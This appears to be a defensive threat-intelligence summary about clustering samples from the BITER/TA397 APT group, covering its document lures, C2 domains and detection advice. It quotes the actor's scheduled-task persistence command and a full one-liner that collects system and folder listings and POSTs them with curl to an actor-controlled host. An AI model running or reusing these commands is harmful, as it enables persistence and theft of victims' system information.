Full Report
How StrikeReady helped a SOC prioritize alerts triggered by a previously untagged APT actor.
Analysis Summary
# Threat Actor: BITER (Attribution Suspected)
## Attribution & Identity
The article directly mentions the threat actor **BITER** in the context of sharing indicators on GitHub. A vendor, Proofpoint, associates related activity with the identifier **TA397**.
## Activity Summary
This summary does not detail specific historical campaigns or large-scale operations by BITER/TA397, but rather focuses on the *methodology* of tracking threats that exhibit suspicious characteristics (like non-matching file extensions, specific command-line arguments, or unique bytecode) to build a cluster of related samples. The examples provided show samples distributed in February 2024 and relate to document files (CHM, RAR/LNK, PDF) often using lures related to professional or governmental topics (e.g., "Crime\_record\_nov\_2023.chm," "Abroad\_Training\_Nominations\_Jan\_2024.rar").
## Tactics, Techniques & Procedures
The article focuses on behavioral pivoting rather than specific, generalized APT TTPs. Specific behaviors observed in clustered samples include:
- Creating scheduled tasks for persistence: `schtasks /create /tn DriverUpdates /f /sc minute /mo 15 /tr [payload]`
- Information gathering and exfiltration executed via `curl`: `systeminfo > C:\Users\Public\Music\desk.txt & tasklist >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Desktop" >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Downloads" >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Documents" >> C:\Users\Public\Music\desk.txt & curl -X POST -F "file=@C:\Users\Public\Music\desk.txt" commonlifesupport[.]com/ssu.php?s=%computername%_%username%`
- Use of unusual file extensions/packaging, specifically distribution via **CHM files** and **`.pdf.lnk`** files often wrapped in `.rar` archives.
- Use of **.NET assembly** payloads (PE32 executable).
- Use of specific IL bytecode patterns (e.g., the function listed in Figure 7).
## Targeting
- Sectors: Not explicitly stated, but lures suggest professional/governmental sectors (e.g., training nominations, official documents).
- Geography: Not explicitly stated, but one sample references Pakistan-China relations.
- Victims: Specific organizations are not named in the summary provided.
## Tools & Infrastructure
- Malware families used:
- PE32 executable (likely custom/commodity malware executed from LNK/CHM).
- VBScript payload (`winegt.vbs`).
- Infrastructure (C2, domains, IPs):
- `isndatumhost[.]com` (used for initial file serving)
- `kaatmusiclab[.]com` (associated C2)
- `commonlifesupport[.]com/ssu.php` (used for exfiltration of system information)
- `adamsresearchshare[.]com/textcmd/cmd1.php` (C2/drop point)
- `adamsresearchshare[.]com/mack.php` (C2/drop point)
- `updnangelgroup[.]com/ridge/visors.php`
- `ellearningstore[.]com/rest/api.php`
- `wcnsappword[.]com/wmis/wave.php`
## Implications
The activities described highlight the use of social engineering via deceptive document files (CHM, LNK) used to deliver payloads, indicating an active intrusion or initial access campaign. The focus on behavioral signatures (scheduled task arguments, API calls) over simple hashes suggests the actor is frequently modifying file names and hashes to evade signature-based detection, requiring analysts to rely on broader behavioral grouping.
## Mitigations
- Enhance detection for scheduled task creation with unusual frequency or minute-level precision (`/sc minute /mo 15`).
- Monitor for system information gathering commands (`systeminfo`, `tasklist`, `dir`) followed immediately by network utilization (`curl -X POST`).
- Scrutinize the delivery of executable content (.jpg mapped to PE32) and the presence of suspicious archive contents like `.lnk` files within documents or archives like `.rar`.
- Incorporate malware analysis focusing on C# IL bytecode or unique .NET function patterns identified in trusted samples to find related, undetected variants.